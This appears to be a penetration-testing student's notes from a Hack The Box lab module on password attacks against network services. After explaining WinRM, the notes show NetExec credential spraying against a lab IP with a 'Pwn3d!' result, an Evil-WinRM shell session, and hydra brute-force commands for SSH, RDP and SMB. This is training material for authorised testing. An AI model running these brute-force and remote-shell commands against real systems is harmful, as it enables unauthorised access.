<aside> <img src="/icons/error_yellow.svg" alt="/icons/error_yellow.svg" width="40px" />
</aside>
Let us imagine that we want to manage a Windows server over the network. Accordingly, we need a service that allows us to access the system, execute commands on it, or access its contents via a GUI or the terminal. In this case, the most common services suitable for this are RDP, WinRM, and SSH. SSH is not as common on Windows, but it is the leading service for Linux-based systems.
Windows Remote Management (WinRM) is the Microsoft implementation of the Web Services Management Protocol (WS-Management). It is a network protocol based on XML web services using the Simple Object Access Protocol (SOAP) used for remote management of Windows systems. It takes care of the communication between Web-Based Enterprise Management (WBEM) and the Windows Management Instrumentation (WMI), which can call the Distributed Component Object Model (DCOM).
By default, WinRM uses the TCP ports 5985 (HTTP) and 5986 (HTTPS).
A handy tool that we can use for our password attacks is NetExec, which can also be used for other protocols such as SMB, LDAP, MSSQL, and others.
NetExec Protocol-Specific Help
usage: netexec smb [-h] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL]
[--verbose] [--debug] [--no-progress] [--log LOG] [-6]
[--dns-server DNS_SERVER] [--dns-tcp]
[--dns-timeout DNS_TIMEOUT] [-u USERNAME [USERNAME ...]]
[-p PASSWORD [PASSWORD ...]] [-id CRED_ID [CRED_ID ...]]
[--ignore-pw-decoding] [--no-bruteforce]
[--continue-on-success] [--gfail-limit LIMIT]
[--ufail-limit LIMIT] [--fail-limit LIMIT] [-k]
[--use-kcache] [--aesKey AESKEY [AESKEY ...]]
[--kdcHost KDCHOST] [--server {https,http}]
[--server-host HOST] [--server-port PORT]
NetExec Usage ⚒️
0xWALY@htb[/htb]$ netexec <proto> <target-IP> -u <user or userlist> -p <password or passwordlist>
As an example, this is what attacking a WinRM endpoint might look like:
0xWALY@htb[/htb]$ netexec winrm 10.129.42.197 -u user.list -p password.list
WINRM 10.129.42.197 5985 NONE [*] None (name:10.129.42.197) (domain:None)
WINRM 10.129.42.197 5985 NONE [*] <http://10.129.42.197:5985/wsman>
WINRM 10.129.42.197 5985 NONE [+] None\user:password (Pwn3d!)
Evil-WinRM, which allows us to communicate with the WinRM service efficiently
evil-winrm -i 10.129.42.197 -u user -p password
Evil-WinRM shell v3.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\user\Documents>
hydra -L user.list -P password.list ssh://10.129.42.197
#then
ssh [email protected]
hydra -L user.list -P password.list rdp://10.129.42.197
#then
xfreerdp /v:10.129.42.197 /u:user /p:password
hydra -L user.list -P password.list smb://10.129.42.197